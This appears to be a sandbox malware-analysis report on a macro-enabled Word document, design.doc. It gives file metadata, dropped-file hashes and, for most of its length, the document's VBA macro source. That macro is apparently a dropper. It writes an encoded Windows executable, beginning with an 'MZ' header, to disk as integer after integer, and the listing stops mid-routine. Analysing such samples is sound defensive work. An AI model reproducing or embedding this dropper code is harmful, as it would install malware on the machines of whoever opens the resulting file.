                            SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                            Malicious:false
                            Preview:............
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):12
                            Entropy (8bit):0.41381685030363374
                            Encrypted:false
                            SSDEEP:3:/l:
                            MD5:E4A1661C2C886EBB688DEC494532431C
                            SHA1:A2AE2A7DB83B33DC95396607258F553114C9183C
                            SHA-256:B76875C50EF704DBBF7F02C982445971D1BBD61AEBE2E4B28DDC58A1D66317D5
                            SHA-512:EFDCB76FB40482BC94E37EAE3701E844BF22C7D74D53AEF93AC7B6AE1C1094BA2F853875D2C66A49A7075EA8C69F5A348B786D6EE0FA711669279D04ADAAC22C
                            Malicious:false
                            Preview:............
                            Process:C:\Users\Public\ctrlpanel.exe
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):198326
                            Entropy (8bit):7.95767281316488
                            Encrypted:false
                            SSDEEP:6144:S1zU9DM7k/ImJZEQkpHkBvveqvgbx/uYL:SaOk/PsQkpeXenbRuYL
                            MD5:4DEDD6539BBF62051EA44275D84043CF
                            SHA1:D2943448503284056AA33778CE0AF737D0CA4D46
                            SHA-256:43BF3EB421F129E31F67C47A29439038FDD4FF0C792EB557645DB144D6C64268
                            SHA-512:F617BB50F294BF108E120AA6646EB2D1E5D1F85FB20F895FD71C42888DA30CD5F7158D49875D7BBC2819012D41835202676C65790C1EF41EC927A0FBFAFD6630
                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Users\Public\ctrlpanel.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:modified
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):162
                            Entropy (8bit):2.781483514235794
                            Encrypted:false
                            SSDEEP:3:KVGl/lilKlRAGlMhlcuEyml/lLlllFmAaa9eHn:KVy/4KDilxmlA/H
                            MD5:23FC45712C143BDADA6D43C802E61804
                            SHA1:1A8E187CBED49D2C4F33815D23B698A4156F0187
                            SHA-256:3C3CE670CBDB8B1FA410164CC2899952149799B8C1115ED023F6CAF8CDC82E84
                            SHA-512:B96E60165449910A788470A3815007D914598FCCA870845C1EFB1622EE7D1F25980BD89C204ACBEF52E7CFF450C5881B90C999413E84D94088F1E43DC6DB7781
                            Malicious:false
                            Preview:.user..................................................j.o.n.e.s..............-K.......N..a7j........4B...................................*K.."..}.yj.........=7j
                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Entropy (8bit):4.775355927973808
                            TrID:
                            • Microsoft Word document (32009/1) 79.99%
                            • Generic OLE2 / Multistream Compound File (8008/1) 20.01%
                            File name:design.doc
                            File size:301'568 bytes
                            MD5:bafcfcf684bd4c363e8c1ab6e66c949c
                            SHA1:aa178a460745bec34cdc7a2d1d88f5f44ce60793
                            SHA256:5eb3b22c292fe83ee3cd938eec69c49ba59b95e6d05ce0e5bfb9b8398bc9e4c4
                            SHA512:3b50b209e4286a3d041e8ac0870b57ec5d8a67986da509ea8ce97d43005424bcfef540a0540f9b4632817792910d07bcbba1daa773b001381934ba427997606d
                            SSDEEP:6144:/XtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZ/:e8J3wRk
                            TLSH:F854F5AD7502850BC3A043F05AD1BFFDB3BE6947ADD4234A0185E6B025AF361DF86D86
                            File Content Preview:........................>.......................O...........R...............N...U...V...W...X..................................................................................................................................................................
                            Icon Hash:35e1cc889a8a8599
                            Document Type:OLE
                            Number of OLE Files:1
                            Has Summary Info:
                            Application Name:Microsoft Office Word
                            Encrypted Document:False
                            Contains Word Document Stream:False
                            Contains Workbook/Book Stream:False
                            Contains PowerPoint Document Stream:False
                            Contains Visio Document Stream:False
                            Contains ObjectPool Stream:False
                            Flash Objects Count:0
                            Contains VBA Macros:True
                            Code Page:1251
                            Title:
                            Subject:
                            Author:2
                            Keywords:
                            Template:Normal
                            Last Saved By:Work
                            Revion Number:3
                            Total Edit Time:720
                            Last Printed:2023-11-18 08:37:00
                            Create Time:2024-04-19 08:09:00
                            Last Saved Time:2024-04-19 08:09:00
                            Number of Pages:2
                            Number of Words:2596
                            Number of Characters:1480
                            Creating Application:Microsoft Office Word
                            Security:0
                            Document Code Page:1251
                            Number of Lines:12
                            Number of Paragraphs:8
                            Thumbnail Scaling Desired:False
                            Company:Microsoft
                            Contains Dirty Links:False
                            Shared Document:False
                            Changed Hyperlinks:False
                            Application Version:786432
                            General
                            Stream Path:Macros/VBA/ThisDocument
                            VBA File Name:ThisDocument.cls
                            Stream Size:251558
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S " . . . . S . . . . . S " . . . . . < . . . . . . . . . . ( . 1 . N . o . r . m . a . l . . . T . h . i .
                            Data Raw:01 16 01 00 00 f0 00 00 00 16 06 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff 1d 06 00 00 55 16 03 00 00 00 00 00 01 00 00 00 d3 ee e1 1a 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Attribute VB_Name = "ThisDocument"
                            Attribute VB_Base = "1Normal.ThisDocument"
                            Attribute VB_GlobalNameSpace = False
                            Attribute VB_Creatable = False
                            Attribute VB_PredeclaredId = True
                            Attribute VB_Exposed = True
                            Attribute VB_TemplateDerived = True
                            Attribute VB_Customizable = True
                            Private Function FE(V As String) As Boolean
                            On Error Resume Next: FE = (FileLen(V) > -1)
                            End Function
                            Private Property Let Y(Value As Long)
                            Put #1, , Value
                            End Property
                            Private Sub CheckHash()
                            Y = 9460301
                            Y = 3
                            Y = 4
                            Y = 65535
                            Y = 184
                            Y = 0
                            Y = 64
                            For I = 1 To 8
                            Y = 0
                            Next
                            Y = 128
                            Y = 247078670
                            Y = -855002112
                            Y = 1275181089
                            Y = 1750344141
                            Y = 1881174889
                            Y = 1919381362
                            Y = 1663069537
                            Y = 1869508193
                            Y = 1700929652
                            Y = 1853190688
                            Y = 544106784
                            Y = 542330692
                            Y = 1701080941
                            Y = 168627502
                            Y = 36
                            Y = 0
                            Y = 17744
                            Y = 262476
                            Y = 1441267592
                            For I = 1 To 2
                            Y = 0
                            Next
                            Y = 16908512
                            Y = 721163
                            Y = 13312
                            Y = 20992
                            Y = 0
                            Y = 21118
                            Y = 8192
                            Y = 24576
                            Y = 4194304
                            Y = 8192
                            Y = 512
                            Y = 4
                            Y = 0
                            Y = 4
                            Y = 0
                            Y = 65536
                            Y = 1024
                            Y = 0
                            Y = -2059403262
                            Y = 1048576
                            Y = 4096
                            Y = 1048576
                            Y = 4096
                            Y = 0
                            Y = 16
                            For I = 1 To 2
                            Y = 0
                            Next
                            Y = 21036
                            Y = 79
                            Y = 32768
                            Y = 19632
                            For I = 1 To 4
                            Y = 0
                            Next
                            Y = 57344
                            Y = 12
                            Y = 24576
                            Y = 28
                            For I = 1 To 10
                            Y = 0
                            Next
                            Y = 8192
                            Y = 8
                            For I = 1 To 2
                            Y = 0
                            Next
                            Y = 8200
                            Y = 72
                            For I = 1 To 2
                            Y = 0
                            Next
                            Y = 2019914798
                            Y = 116
                            Y = 12932
                            Y = 8192
                            Y = 13312
                            Y = 1024
                            For I = 1 To 3
                            Y = 0
                            Next
                            Y = 1610612768
                            Y = 1633973038
                            Y = 24948
                            Y = 312
                            Y = 24576
                            Y = 512
                            Y = 14336
                            For I = 1 To 3
                            Y = 0
                            Next
                            Y = -1073741760
                            Y = 1920168494
                            Y = 99
                            Y = 19632
                            Y = 32768
                            Y = 19968
                            Y = 14848
                            For I = 1 To 3
                            Y = 0
                            Next
                            Y = 1073741888
                            Y = 1818587694
                            Y = 25455
                            Y = 12
                            Y = 57344
                            Y = 512
                            Y = 34816
                            For I = 1 To 3
                            Y = 0
                            Next
                            Y = 1107296320
                            For I = 1 To 122
                            Y = 0
                            Next
                            Y = 21088
                            Y = 0
                            Y = 72
                            Y = 327682
                            Y = 12568
                            Y = 8468
                            Y = 1
                            Y = 100663305
                            For I = 1 To 12
                            Y = 0
                            Next
                            Y = 1143662
                            Y = 142607872
                            Y = 1929641984
                            Y = 100663308
                            Y = 2432
                            Y = 176165892
                            Y = 704905216
                            Y = 274459
                            Y = 167
                            Y = 285212673
                            Y = 370
                            Y = 75888
                            Y = 176163328
                            Y = -570163200
                            Y = 36185358
                            Y = 168427520
                            Y = 808
                            Y = 2113986058
                            Y = 67108874
                            Y = 1914114605
                            Y = 1879048193
                            Y = 1139
                            Y = 688138
                            Y = 187368448
                            Y = 2686
                            Y = 356100
                            Y = 1915357696
                            Y = 1879048227
                            Y = 42610
                            Y = 294512
                            Y = 103285760
                            Y = -569769984
                            Y = 36185358
                            Y = 185204736
                            Y = 808
                            Y = 335601162
                            Y = 657150
                            Y = 124978688
                            Y = 336199680
                            Y = 256032
                            Y = 141759744
                            Y = -2146828288
                            Y = 67108870
                            Y = 185007636
                            Y = 1929773056
                            Y = 167772167
                            Y = 196616212
                            Y = 1930756096
                            Y = 167772168
                            Y = 1920
                            Y = 600068
                            Y = 2755072
                            Y = 7169
                            Y = 0
                            Y = 234885393
                            Y = 16777224
                            Y = 4390912
                            Y = 234903830
                            Y = 16777224
                            Y = 208923
                            Y = 44
                            Y = 285212674
                            Y = 2174
                            Y = 1339140
                            Y = 249431552
                            Y = 141349
                            Y = 671746560
                            Y = 167772163
                            Y = 108921054
                            Y = 537133056
                            Y = 1000
                            Y = 683797
                            Y = 707136000
                            Y = 4097
                            Y = 0
                            Y = 234884108
                            Y = 16777224
                            Y = 208923
                            Y = 44
                            Y = 285212675
                            Y = 2430
                            Y = 1011460
                            Y = 249431552
                            Y = 141349
                            Y = 671746560
                            Y = 167772163
                            Y = 125698270
                            Y = 537133056
                            Y = 3000
                            Y = 683797
                            Y = 707136000
                            Y = 4097
                            Y = 0
                            Y = 234884108
                            Y = 16777224
                            Y = 12219046
                            Y = 25194496
                            Y = 1912864768
                            Y = 1879048504
                            Y = 640
                            Y = 28602884
                            Y = 58748928
                            Y = 1912864768
                            Y = 1879048640
                            Y = 1152
                            Y = 10756
                            Y = 274451
                            Y = 83
                            Y = 285212676
                            Y = 122994
                            Y = 1779895152
                            Y = 880386
                            Y = 225053184
                            Y = 121252620
                            Y = 392759298
                            Y = 3624
                            Y = 993290
                            Y = 147982848
                            Y = 1058818
                            Y = 1483344384
                            Y = 542665239
                            Y = 256
                            Y = 1641176426
                            Y = 4392
                            Y = 1189898
                            Y = 321391104
                            Y = 185204736
                            Y = 1483347720
                            Y = 822675468
                            Y = 2754498
                            Y = 339987
                            Y = 52
                            Y = 285212677
                            Y = 1342335510
                            Y = 1494726542
                            Y = 722078570
                            Y = 105906722
                            Y = 105906793
                            Y = 33984873
                            Y = 1790414416
                            Y = 1483347800
                            Y = 65568
                            Y = -765629952
                            Y = 386309217
                            Y = 101341290
                            Y = 718942471
                            Y = 143379
                            Y = 54
                            Y = 285212678
                            Y = 122994
                            Y = 318901104
                            Y = 722277892
                            Y = 151261467
                            Y = 134679697
                            Y = 4392
                            Y = 1189898
                            Y = 321391104
                            Y = 185204736
                            Y = 223876873
                            Y = -1912336119
                            Y = 132002487
                            Y = 552
                            Y = 10758
                            Y = 405523
                            Y = 45
                            Y = 285212679
                            Y = 5160
                            Y = 36176394
                            Y = 1862664192
                            Y = 167772181
                            Y = 5743
                            Y = 1517578
                            Y = -495842816
                            Y = 1919942657
                            Y = 1879048678
                            Y = 672535831
                            Y = 167772184
                            Y = 42
                            Y = 405523
                            Y = 33
                            Y = 285212680
                            Y = 31879682
                            Y = -495816704
                            Y = 393216001
                            Y = 405280277
                            Y = 269090816
                            Y = 422052352
                            Y = 671744000
                            Y = 100663300
                            Y = 42
                            Y = 274451
                            Y = 79
                            Y = 285212681
                            Y = 1930893570
                            Y = 167772186
                            Y = 460261131
                            Y = 386531328
                            Y = 392780138
                            Y = 1674584
                            Y = 118096128
                            Y = -1912203770
                            Y = 1863607
                            Y = 304482816
                            Y = 206848
                            Y = 1862731264
                            Y = 167772189
                            Y = 1930958851
                            Y = 167772186
                            Y = 369494028
                            Y = 1874300422
                            Y = 167772190
                            Y = 1928968
                            Y = 2755072
                            Y = 522715722
                            Y = 34209792
                            Y = 8307
                            Y = 945930
                            Y = 2754048
                            Y = 77843
                            Y = 7
                            Y = 285212682
                            Y = 752386
                            Y = 2753536
                            Y = 143379
                            Y = 62
                            Y = 285212683
                            Y = 134096130
                            Y = 100663312
                            Y = 8563
                            Y = 2063731210
                            Y = 67108875
                            Y = 2063731756
                            Y = 67108875
                            Y = 2256646
                            Y = 50465280
                            Y = 2941
                            Y = 192610820
                            Y = 738459648
                            Y = 192610828
                            Y = 100925440
                            Y = 9071
                            Y = 10762
                            Y = 143387
                            Y = 41
                            Y = 285212684
                            Y = 880386
                            Y = 611255808
                            Y = 755630080
                            Y = 225378827
                            Y = 1862664192
                            Y = 167772197
                            Y = 673517278
                            Y = 167772162
                            Y = 206858
                            Y = 14551552
                            Y = 42
                            Y = 4097
                            Y = 0
                            Y = 234887706
                            Y = 16777224
                            Y = 274459
                            Y = 380
                            Y = 285212685
                            Y = 9768
                            Y = 369890058
                            Y = 1631062803
                            Y = 285212673
                            Y = -1710550772
                            Y = 661587466
                            Y = 956956672
                            Y = 313
                            Y = 2649862
                            Y = 1075317248
                            Y = 301
                            Y = 2715398
                            Y = 711920128
                            Y = 1913257984
                            Y = 1879048682
                            Y = 2828311
                            Y = 118163968
                            Y = 320212499
                            Y = 8534029
                            Y = 235995136
                            Y = 211422481
                            Y = 2893832
                            Y = 2114783744
                            Y = 67108868
                            Y = 128626
                            Y = 1255536
                            Y = 757598720
                            Y = 638189568
                            Y = 1150
                            Y = 33845764
                            Y = 671707136
                            Y = 100663302
                            Y = 136306
                            Y = 3025008
                            Y = 68356608
                            Y = 791151633
                            Y = 755630080
                            Y = 68225060
                            Y = 1832
                            Y = 369365254
                            Y = 807933206
                            Y = 638189568
                            Y = 673517534
                            Y = 167772162
                            Y = 52954387
                            Y = -569769984
                            Y = 621796864
                            Y = 552
                            Y = 671486730
                            Y = 167772163
                            Y = 219218142
                            Y = 219371543
                            Y = 235998481
                            Y = 1933555598
                            Y = 2130706431
                            Y = 67108868
                            Y = 132210
                            Y = 1255536
                            Y = 510790144
                            Y = 376438786
                            Y = 11048
                            Y = 319228682
                            Y = 252909072
                            Y = 269570859
                            Y = 328863505
                            Y = 671551751
                            Y = 167772204
                            Y = 1862666259
                            Y = 167772201
                            Y = 10863
                            Y = 36336138
                            Y = 135360512
                            Y = 1320
                            Y = 36598278
                            Y = 774402048
                            Y = 319422464
                            Y = 671682825
                            Y = 167772207
                            Y = 118559021
                            Y = 120064273
                            Y = 285605888
                            Y = 824712201
                            Y = 285868032
                            Y = 324540175
                            Y = 286200079
                            Y = 850890256
                            Y = 621797029
                            Y = 552
                            Y = 671748874
                            Y = 167772163
                            Y = 185663710
                            Y = 185817111
                            Y = 202443537
                            Y = -1807763570
                            Y = 721420286
                            Y = 19521
                            Y = 0
                            Y = 157
                            Y = 13
                            Y = 170
                            Y = 15
                            Y = 16777224
                            Y = 0
                            Y = 91
                            Y = 96
                            Y = 187
                            Y = 15
                            Y = 16777224
                            Y = 0
                            Y = 21
                            Y = 326
                            Y = 347
                            Y = 15
                            Y = 16777224
                            Y = 522715838
                            Y = 34209792
                            Y = 818452
                            Y = 1912734720
                            Y = 1879048672
                            Y = 3709
                            Y = 544408068
                            Y = 1862926336
                            Y = 100663315
                            Y = 3371778
                            Y = 310184448
                            Y = 704905216
                            Y = 77843
                            Y = 7
                            Y = 285212686
                            Y = 1014530
                            Y = 2753536
                            Y = 143379
                            Y = 62
                            Y = 285212687
                            Y = 134096130
                            Y = 100663318
                            Y = 8563
                            Y = 2063731210
                            Y = 67108879
                            Y = 2063731756
                            Y = 67108879
                            Y = 2256646
                            Y = 50465280
                            Y = 3965
                            Y = 259719684
                            Y = 738459648
                            Y = 259719692
                            Y = 100925440
                            Y = 9071
                            Y = 10762
                            Y = 274459
                            Y = 267
                            Y = 285212688
                            Y = 1404674
                            Y = -684063232
                            Y = 2113929216
                            Y = 67108865
                            Y = 145522
                            Y = 680269680
                            Y = 671154176
                            Y = 167772166
                            Y = 382
                            Y = 38695428
                            Y = -1944621056
                            Y = 16777256
                            Y = 1576
                            Y = 163338
                            Y = 1718748160
                            Y = 1919942658
                            Y = 1879048834
                            Y = 1576
                            Y = 209388042
                            Y = 1862533120
                            Y = 167772212
                            Y = 2853910
                            Y = 302776576
                            Y = 3505666
                            Y = 302844416
                            Y = 3505667
                            Y = 68356608
                            Y = 913245202
                            Y = 34209792
                            Y = 3195
                            Y = 3505668
                            Y = 68356608
                            Y = 897451026
                            Y = 218759168
                            Y = 897450770
                            Y = 201981952
                            Y = 930021906
                            Y = -569769984
                            Y = 36185358
                            Y = 168427520
                            Y = 808
                            Y = 33611274
                            Y = 14451
                            Y = 818442
                            Y = 2063729664
                            Y = 67108876
                            Y = 3763990
                            Y = 2063731200
                            Y = 67108876
                            Y = 3829526
                            Y = 2063731200
                            Y = 67108876
                            Y = 3895065
                            Y = 2063731200
                            Y = 67108876
                            Y = 3960599
                            Y = 1862404608
                            Y = 100663314
                            Y = 9327
                            Y = 34286858
                            Y = 4719
                            Y = 2453254
                            Y = 249432576
                            Y = 141349
                            Y = 671812096
                            Y = 167772163
                            Y = 2752734
                            Y = 7169
                            Y = 4784128
                            Y = 234920272
                            Y = 16777224
                            Y = 0
                            Y = 234945788
                            Y = 16777224
                            Y = 143387
                            Y = 34
                            Y = 285212689
                            Y = 817922
                            Y = 1030685696
                            Y = 185204736
                            Y = 282987031
                            Y = 141349
                            Y = 369887744
                            Y = 206858
                            Y = 14551552
                            Y = 10758
                            Y = 4097
                            Y = 0
                            Y = 268439568
                            Y = 16777224
                            Y = 1191963
                            Y = 1260
                            Y = 285212690
                            Y = 1080066
                            Y = -1925643264
                            Y = 33554435
                            Y = 4475
                            Y = 276496900
                            Y = -1912340480
                            Y = 57097399
                            Y = 2063728640
                            Y = 67108880
                            Y = 1145602
                            Y = 194642944
                            Y = 4092679
                            Y = 101321216
                            Y = 16239
                            Y = 303829770
                            Y = 4204572
                            Y = 487787008
                            Y = 1093147922
                            Y = 101318656
                            Y = 16239
                            Y = 303698698
                            Y = 4204570
                            Y = 454232576
                            Y = 1109924626
                            Y = 1477050368
                            Y = 4157190
                            Y = 403900928
                            Y = 1076369426
                            Y = 319422464
                            Y = 672731673
                            Y = 167772227
                            Y = 1064240728
                            Y = 319422464
                            Y = 672535062
                            Y = 167772224
                            Y = 387061523
                            Y = 17448
                            Y = 991320074
                            Y = 709
                            Y = 4157190
                            Y = 68356608
                            Y = 4550406
                            Y = 101911040
                            Y = 4615942
                            Y = 118688256
                            Y = 18216
                            Y = 36336138
                            Y = 671576064
                            Y = 167772232
                            Y = 18728
                            Y = 1929973002
                            Y = 167772222
                            Y = 386467596
                            Y = 18984
                            Y = 209388042
                            Y = 1862533120
                            Y = 167772212
                            Y = 303960841
                            Y = 730600990
                            Y = 318832640
                            Y = 371135007
                            Y = 11148
                            Y = 304091905
                            Y = 730600992
                            Y = 318832640
                            Y = 2116096545
                            Y = 167772213
                            Y = 571613715
                            Y = 13694
                            Y = 304288522
                            Y = 3505699
                            Y = 605227520
                            Y = 897459218
                            Y = 319422464
                            Y = 2116358693
                            Y = 167772213
                            Y = 638723603
                            Y = 13694
                            Y = 304550666
                            Y = 3505703
                            Y = 672336384
                            Y = -1944705006
                            Y = 16777259
                            Y = 689056019
                            Y = 13694
                            Y = 304747274
                            Y = 3505706
                            Y = 722668032
                            Y = -1944638702
                            Y = 16777259
                            Y = 739388435
                            Y = 13694
                            Y = 304943882
                            Y = 4943661
                            Y = 504433152
                            Y = 19496
                            Y = 85134602
                            Y = 393152770
                            Y = 285605888
                            Y = 5074693
                            Y = 1075186176
                            Y = 398
                            Y = 319358225
                            Y = 523047469
                            Y = 2657293
                            Y = 739442944
                            Y = 897461266
                            Y = 319422464
                            Y = 2116751915
                            Y = 167772213
                            Y = 705833491
                            Y = 2853910
                            Y = 689111296
                            Y = 897460498
                            Y = 319422464
                            Y = 2116555304
                            Y = 167772213
                            Y = 655501075
                            Y = 13694
                            Y = 304485130
                            Y = 3505702
                            Y = 622004736
                            Y = 897459474
                            Y = 319422464
                            Y = 2116293156
                            Y = 167772213
                            Y = 588391187
                            Y = 13694
                            Y = 304222986
                            Y = 3505698
                            Y = 554895872
                            Y = 897458450
                            Y = 319422464
                            Y = 2116031008
                            Y = 167772213
                            Y = 521281299
                            Y = 13694
                            Y = 303960842
                            Y = 3505694
                            Y = 772999680
                            Y = 1315909138
                            Y = 285868032
                            Y = 4991021
                            Y = 34408960
                            Y = 1535753
                            Y = 85001728
                            Y = 20335
                            Y = 5271306
                            Y = -1944647168
                            Y = 16777256
                            Y = 20847
                            Y = 285807370
                            Y = 5402377
                            Y = 135465472
                            Y = 1862404113
                            Y = 100663320
                            Y = 21359
                            Y = 1862603018
                            Y = 167772244
                            Y = 672597769
                            Y = 167772234
                            Y = 4092679
                            Y = 302647808
                            Y = 68293892
                            Y = 21800
                            Y = 678189578
                            Y = 167772246
                            Y = 68289555
                            Y = 671355413
                            Y = 167772247
                            Y = 1479044186
                            Y = 319422464
                            Y = 352588292
                            Y = 1495794706
                            Y = 1510604800
                            Y = 5908588
                            Y = 68356608
                            Y = 303367186
                            Y = 5974020
                            Y = 1817840128
                            Y = 23592
                            Y = 100930314
                            Y = 1567556625
                            Y = 101318656
                            Y = 1584334353
                            Y = 101318656
                            Y = 1601111825
                            Y = -569769984
                            Y = 36185374
                            Y = 319422464
                            Y = 206858
                            Y = 266209792
                            Y = 141349
                            Y = 185797120
                            Y = 808
                            Y = 151051786
                            Y = 24616
                            Y = 621796874
                            Y = 552
                            Y = 671879946
                            Y = 167772163
                            Y = 85000414
                            Y = 2853910
                            Y = 772997376
                            Y = 897461778
                            Y = 319422464
                            Y = 2116882989
                            Y = 167772213
                            Y = 739388435
                            Y = 24943
                            Y = 621796874
                            Y = 552
                            Y = 671945482
                            Y = 167772163
                            Y = 151126238
                            Y = 5999
                            Y = 621796870
                            Y = 552
                            Y = 672011018
                            Y = 167772163
                            Y = 33685726
                            Y = 4475
                            Y = 2102925060
                            Y = 67108881
                            Y = 91704
                            Y = 2098463232
                            Y = 67108880
                            Y = 293410306
                            Y = 939786240
                            Y = 339
                            Y = 13171
                            Y = 672076554
                            Y = 167772198
                            Y = 320221203
                            Y = 293022511
                            Y = -1708191440
                            Y = 286331155
                            Y = 10095
                            End Sub
                            Private Sub CheckHash0()
                            Y = 290466826
                            Y = 2649873
                            Y = 857213440
                            Y = 286200094
                            Y = 2715409
                            Y = 711920128
                            Y = 2114584576
                            Y = 67108867
                            Y = 2828311
                            Y = 1651444224
                            Y = 285868032
                            Y = 2649873
                            Y = 857278976
                            Y = 286200094
                            Y = 2715409
                            Y = 711920128
                            Y = 2114584576
                            Y = 67108867
                            Y = 2828310
                            Y = 1651444224
                            Y = -569769984
                            Y = 36185359
                            Y = 319422464
                            Y = 206866
                            Y = 14551552
                            Y = 1477914385
                            Y = 789655315
                            Y = -1215418351
                            Y = 35094834
                            Y = 3195
                            Y = 6516484
                            Y = 1684998656
                            Y = 319422464
                            Y = 722670385
                            Y = 34541888
                            Y = 3195
                            Y = 6516484
                            Y = 319883776
                            Y = 25967
                            Y = 6713098
                            Y = 58591744
                            Y = 369360896
                            Y = 11048
                            Y = 6450954
                            Y = 266209792
                            Y = 141349
                            Y = 336792064
                            Y = 808
                            Y = 285269514
                            Y = 324540179
                            Y = 286462227
                            Y = 1941582129
                            Y = 167772211
                            Y = 252776467
                            Y = 26479
                            Y = 724701962
                            Y = 674370092
                            Y = 167772264
                            Y = 353441043
                            Y = 26920
                            Y = 6957066
                            Y = -1972237824
                            Y = 376438786
                            Y = 27432
                            Y = 154342922
                            Y = 353439761
                            Y = 27759
                            Y = 674370058
                            Y = 167772269
                            Y = 249482029
                            Y = 385757714
                            Y = 452984834
                            Y = 28271
                            Y = 285400074
                            Y = 7302928
                            Y = 276630016
                            Y = 704905216
                            Y = 50241
                            Y = 0
                            Y = 636
                            Y = 117
                            Y = 753
                            Y = 15
                            Y = 16777224
                            Y = 0
                            Y = 408
                            Y = 360
                            Y = 768
                            Y = 15
                            Y = 16777224
                            Y = 0
                            Y = 783
                            Y = 8
                            Y = 791
                            Y = 15
                            Y = 16777224
                            Y = 0
                            Y = 806
                            Y = 37
                            Y = 843
                            Y = 15
                            Y = 16777224
                            Y = 0
                            Y = 30
                            Y = 837
                            Y = 867
                            Y = 15
                            Y = 16777224
                            Y = 0
                            Y = 946
                            Y = 91
                            Y = 1037
                            Y = 15
                            Y = 16777224
                            Y = 0
                            Y = 1089
                            Y = 43
                            Y = 1132
                            Y = 15
                            Y = 16777224
                            Y = 2
                            Y = 1166
                            Y = 66
                            Y = 1232
                            Y = 14
                            Y = 0
                            Y = 274451
                            Y = 116
                            Y = 285212691
                            Y = 209388055
                            Y = 1862533120
                            Y = 167772259
                            Y = 25711
                            Y = 722078474
                            Y = 209388122
                            Y = 1862533120
                            Y = 167772259
                            Y = 6647558
                            Y = 1718553088
                            Y = 1913257984
                            Y = 1879048746
                            Y = 817922
                            Y = 1668219904
                            Y = 101318656
                            Y = 25967
                            Y = 7368458
                            Y = 1227360768
                            Y = 50987008
                            Y = 7022614
                            Y = 857082368
                            Y = 209388054
                            Y = 1862533120
                            Y = 167772259
                            Y = 6647558
                            Y = 1903102464
                            Y = 101318656
                            Y = 101341207
                            Y = 715272455
                            Y = 274451
                            Y = 664
                            Y = 285212692
                            Y = 948994
                            Y = -529398784
                            Y = 376438785
                            Y = 27432
                            Y = 120460810
                            Y = 948994
                            Y = 1915356160
                            Y = 1879048672
                            Y = -1804466164
                            Y = 678428674
                            Y = 167772179
                            Y = -260962292
                            Y = 678428674
                            Y = 167772179
                            Y = 1282541580
                            Y = 678428675
                            Y = 167772179
                            Y = 1785858060
                            Y = 678428675
                            Y = 167772179
                            Y = -1166931956
                            Y = 678428675
                            Y = 167772179
                            Y = -562952180
                            Y = 678428675
                            Y = 167772179
                            Y = -59635700
                            Y = 678428675
                            Y = 167772179
                            Y = 7481356
                            Y = 387516928
                            Y = 6771
                            Y = 7566090
                            Y = 369756672
                            Y = 219547155
                            Y = 369365782
                            Y = -986184429
                            Y = 100663296
                            Y = 29807
                            Y = 285610762
                            Y = 187897348
                            Y = 386729489
                            Y = -1388837869
                            Y = 285212672
                            Y = 137562374
                            Y = 1477903377
                            Y = 1596654611
                            Y = 823591953
                            Y = 745670717
                            Y = 292552708
                            Y = 7677956
                            Y = 1148324352
                            Y = 678428676
                            Y = 167772206
                            Y = 1248987148
                            Y = 158334980
                            Y = 29992
                            Y = 71594506
                            Y = 774402048
                            Y = 201981952
                            Y = 72380936
                            Y = 321417216
                            Y = 201981952
                            Y = 1913132843
                            Y = 1879049290
                            Y = 7677961
                            Y = 1148324352
                            Y = 678428676
                            Y = 167772206
                            Y = 218501388
                            Y = 100930327
                            Y = 30319
                            Y = 7827210
                            Y = 2099712
                            Y = 1778384912
                            Y = 1778717019
                            Y = 1913137713
                            Y = 1879049310
                            Y = 4904
                            Y = 1913129994
                            Y = 1879049330
                            Y = 1965557009
                            Y = 1913257984
                            Y = 1879049284
                            Y = 11816
                            Y = 85003274
                            Y = 85153815
